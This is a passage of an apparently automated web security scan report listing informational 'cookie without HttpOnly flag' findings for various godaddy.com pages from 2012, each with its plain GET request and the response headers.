Set-Cookie: preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; domain=godaddy.com; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:59:10 GMT; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:59:10 GMT; path=/
Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:59:10 GMT; path=/
Set-Cookie: SplitValue1=16; domain=godaddy.com; expires=Tue, 06-Mar-2012 01:59:10 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/hosting/website-builder.aspx/&server=M1PWCORPWEB137&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=&referringdomain=&split=16; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:59:09 GMT
Connection: close
Content-Length: 139003


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><li
...[SNIP]...

4.77. http://www.godaddy.com/icann/domain_search.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /icann/domain_search.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /icann/domain_search.aspx HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=2gelekbswxnboi2nl0fbusne; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=2gelekbswxnboi2nl0fbusne; path=/; HttpOnly
Set-Cookie: preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; domain=godaddy.com; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:41:59 GMT; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:41:59 GMT; path=/
Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:41:59 GMT; path=/
Set-Cookie: SplitValue1=79; domain=godaddy.com; expires=Tue, 06-Mar-2012 01:41:59 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/icann/domain_search.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=&referringdomain=&split=79; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:41:59 GMT
Connection: close
Content-Length: 89453


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><li
...[SNIP]...

4.78. http://www.godaddy.com/jobs/default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /jobs/default.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /jobs/default.aspx HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=xs3u32cf4rn3keo224ona3hd; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=xs3u32cf4rn3keo224ona3hd; path=/; HttpOnly
Set-Cookie: preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; domain=godaddy.com; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:42:31 GMT; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:42:31 GMT; path=/
Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:42:31 GMT; path=/
Set-Cookie: SplitValue1=83; domain=godaddy.com; expires=Tue, 06-Mar-2012 01:42:31 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/jobs/default.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=&referringdomain=&split=83; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:42:31 GMT
Connection: close
Content-Length: 84117


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><li
...[SNIP]...

4.79. http://www.godaddy.com/legal-agreements.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /legal-agreements.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /legal-agreements.aspx?ci=46445&otab=2 HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=pws21k1bibw4bdrfmld21x3a; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=pws21k1bibw4bdrfmld21x3a; path=/; HttpOnly
Set-Cookie: preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; domain=godaddy.com; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:42:07 GMT; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:42:07 GMT; path=/
Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:42:07 GMT; path=/
Set-Cookie: SplitValue1=68; domain=godaddy.com; expires=Tue, 06-Mar-2012 01:42:07 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/legal-agreements.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=ci=46445&otab=2&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=&referringdomain=&split=68; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:42:06 GMT
Connection: close
Content-Length: 181562


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><li
...[SNIP]...

4.80. http://www.godaddy.com/offers/hot-deals.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /offers/hot-deals.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /offers/hot-deals.aspx HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: http://www.godaddy.com/offers/hot-deals2.aspx?ci=51455
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=1gtr01qdlhsi5dlxxflwid50; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=1gtr01qdlhsi5dlxxflwid50; path=/; HttpOnly
Set-Cookie: preferences1=_sid=&dataCenterCode=US; domain=godaddy.com; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:41:44 GMT
Connection: close
Content-Length: 171

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.godaddy.com/offers/hot-deals2.aspx?ci=51455">here</a>.</h2>
</body></html>

4.81. http://www.godaddy.com/offers/hot-deals2.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /offers/hot-deals2.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /offers/hot-deals2.aspx HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=3rfasjtyk4vvfpbmn4ck5452; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=3rfasjtyk4vvfpbmn4ck5452; path=/; HttpOnly
Set-Cookie: preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; domain=godaddy.com; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:59:34 GMT; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:59:34 GMT; path=/
Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:59:34 GMT; path=/
Set-Cookie: SplitValue1=33; domain=godaddy.com; expires=Tue, 06-Mar-2012 01:59:34 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/offers/hot-deals2.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=&referringdomain=&split=33; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:59:33 GMT
Connection: close
Content-Length: 96746


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1">
<
...[SNIP]...

4.82. http://www.godaddy.com/popups/facebook-ads.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /popups/facebook-ads.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /popups/facebook-ads.aspx HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=phbnkb4qnuoa1ioza11ts0d3; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=phbnkb4qnuoa1ioza11ts0d3; path=/; HttpOnly
Set-Cookie: SplitValue1=83; domain=godaddy.com; expires=Tue, 06-Mar-2012 01:59:55 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/popups/facebook-ads.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=&referringdomain=&split=83; domain=godaddy.com; path=/
Set-Cookie: preferences1=_sid=; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:59:55 GMT
Connection: close
Content-Length: 4136


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><link r
...[SNIP]...

4.83. http://www.godaddy.com/popups/fotolia.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /popups/fotolia.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /popups/fotolia.aspx HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=yvfzmfas0hzszrm0wz3etg5c; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=yvfzmfas0hzszrm0wz3etg5c; path=/; HttpOnly
Set-Cookie: SplitValue1=18; domain=godaddy.com; expires=Tue, 06-Mar-2012 01:59:59 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/popups/fotolia.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=&referringdomain=&split=18; domain=godaddy.com; path=/
Set-Cookie: preferences1=_sid=; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:59:58 GMT
Connection: close
Content-Length: 5343


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><link r
...[SNIP]...

4.84. http://www.godaddy.com/popups/google-adwords.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /popups/google-adwords.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /popups/google-adwords.aspx HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=pm35d4yjdfa204b5zewq54vr; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=pm35d4yjdfa204b5zewq54vr; path=/; HttpOnly
Set-Cookie: SplitValue1=69; domain=godaddy.com; expires=Tue, 06-Mar-2012 01:59:47 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/popups/google-adwords.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=&referringdomain=&split=69; domain=godaddy.com; path=/
Set-Cookie: preferences1=_sid=; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:59:47 GMT
Connection: close
Content-Length: 5730


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><link r
...[SNIP]...

4.85. http://www.godaddy.com/popups/microsoft-advertising.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /popups/microsoft-advertising.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /popups/microsoft-advertising.aspx HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=xg4ff3dgejwdenlxhj5r0njf; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=xg4ff3dgejwdenlxhj5r0njf; path=/; HttpOnly
Set-Cookie: SplitValue1=39; domain=godaddy.com; expires=Tue, 06-Mar-2012 01:59:50 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/popups/microsoft-advertising.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=&referringdomain=&split=39; domain=godaddy.com; path=/
Set-Cookie: preferences1=_sid=; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:59:49 GMT
Connection: close
Content-Length: 5045


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><link r
...[SNIP]...

4.86. http://www.godaddy.com/reseller/domain-reseller.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /reseller/domain-reseller.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /reseller/domain-reseller.aspx HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=wnfntnkpvzle5ijleazasavi; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=wnfntnkpvzle5ijleazasavi; path=/; HttpOnly
Set-Cookie: preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; domain=godaddy.com; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:41:51 GMT; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:41:51 GMT; path=/
Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:41:51 GMT; path=/
Set-Cookie: SplitValue1=13; domain=godaddy.com; expires=Tue, 06-Mar-2012 01:41:51 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/reseller/domain-reseller.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=&referringdomain=&split=13; domain=godaddy.com; path=/
Set-Cookie: GoogleADServicesgoogleadwordsreseller=eefgzcffmjahhbddvhfddalcpcifydch; domain=godaddy.com; expires=Sat, 05-Mar-2022 01:41:51 GMT; path=/
Date: Mon, 05 Mar 2012 01:41:51 GMT
Connection: close
Content-Length: 119058


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><li
...[SNIP]...

4.87. http://www.godaddy.com/scholarship/default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /scholarship/default.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /scholarship/default.aspx HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=y1ftsx5kgoy2ttoibsvas4lw; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=y1ftsx5kgoy2ttoibsvas4lw; path=/; HttpOnly
Set-Cookie: preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; domain=godaddy.com; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:42:35 GMT; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:42:35 GMT; path=/
Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:42:35 GMT; path=/
Set-Cookie: SplitValue1=92; domain=godaddy.com; expires=Tue, 06-Mar-2012 01:42:35 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/scholarship/default.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=&referringdomain=&split=92; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:42:34 GMT
Connection: close
Content-Length: 108747


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1">
<
...[SNIP]...

4.88. http://www.godaddy.com/search-engine/seo-services.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /search-engine/seo-services.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /search-engine/seo-services.aspx HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=pq3pjts2ohgngvrcdxb1zxoj; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=pq3pjts2ohgngvrcdxb1zxoj; path=/; HttpOnly
Set-Cookie: preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; domain=godaddy.com; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:41:47 GMT; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:41:47 GMT; path=/
Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:41:47 GMT; path=/
Set-Cookie: SplitValue1=23; domain=godaddy.com; expires=Tue, 06-Mar-2012 01:41:47 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/search-engine/seo-services.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=&referringdomain=&split=23; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:41:47 GMT
Connection: close
Content-Length: 151260


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><ti
...[SNIP]...

4.89. http://www.godaddy.com/shared/homepage2/1/popups/instant-page.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /shared/homepage2/1/popups/instant-page.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /shared/homepage2/1/popups/instant-page.aspx?ci=44918&callback=jsonContent._fill&targetDivId=instantPageModal&jsonContent._fill=jQuery15104665068816393614_1330911036114&_=1330911054740 HTTP/1.1
Host: www.godaddy.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11
Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01
Referer: http://www.godaddy.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ws5jw4vh5tuzq2dphfi4us5a; preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; SplitValue1=75; flag1=cflag=us; currencypopin1=cdisplaypopin=false; GoogleADServicesgoogleadwordshome=zbnczeofsfcgdhzeqcxgcadeafyilatc; pathway=221039fb-1ef3-4a9c-9888-ebefb84fcda3; pagecount=1; actioncount=; app_pathway=; visitor=vid=221039fb-1ef3-4a9c-9888-ebefb84fcda3; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMajorVer=-1&fMinorVer=-1&slMajorVer=-1&slMinorVer=-1; adc1=US; currency1=potableSourceStr=USD; traffic=cookies=1&referrer=http://www.godaddy.com/&sitename=www.godaddy.com&page=/&server=M1PWCORPWEB137&status=200 OK&querystring=%26hpGoogleStatic%3d1&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=221039fb-1ef3-4a9c-9888-ebefb84fcda3&referringdomain=&split=75; HPBackground=Danica2

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/javascript; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: traffic=cookies=1&referrer=http://www.godaddy.com/&sitename=www.godaddy.com&page=/shared/homepage2/1/popups/instant-page.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=ci=44918&callback=jsonContent._fill&targetDivId=instantPageModal&jsonContent._fill=jQuery15104665068816393614_1330911036114&_=1330911054740%26hpGoogleStatic%3d1&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=221039fb-1ef3-4a9c-9888-ebefb84fcda3&referringdomain=&split=75; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:32:00 GMT
Content-Length: 40293

jsonContent._fill({"Html":"\r\n\u003cstyle type=\"text/css\"\u003e\n.modal_popin{background-color:#4f4f4f;border:solid 5px #adadad;width:585px;margin:0;padding:0;text-align:center;-moz-box-shadow:0 0
...[SNIP]...

4.90. http://www.godaddy.com/shared/video/producttube.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /shared/video/producttube.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /shared/video/producttube.aspx HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: application/json; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=hywignijy1tkc5v5ob0xzqwr; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=hywignijy1tkc5v5ob0xzqwr; path=/; HttpOnly
Set-Cookie: SplitValue1=51; domain=godaddy.com; expires=Tue, 06-Mar-2012 01:42:48 GMT; path=/
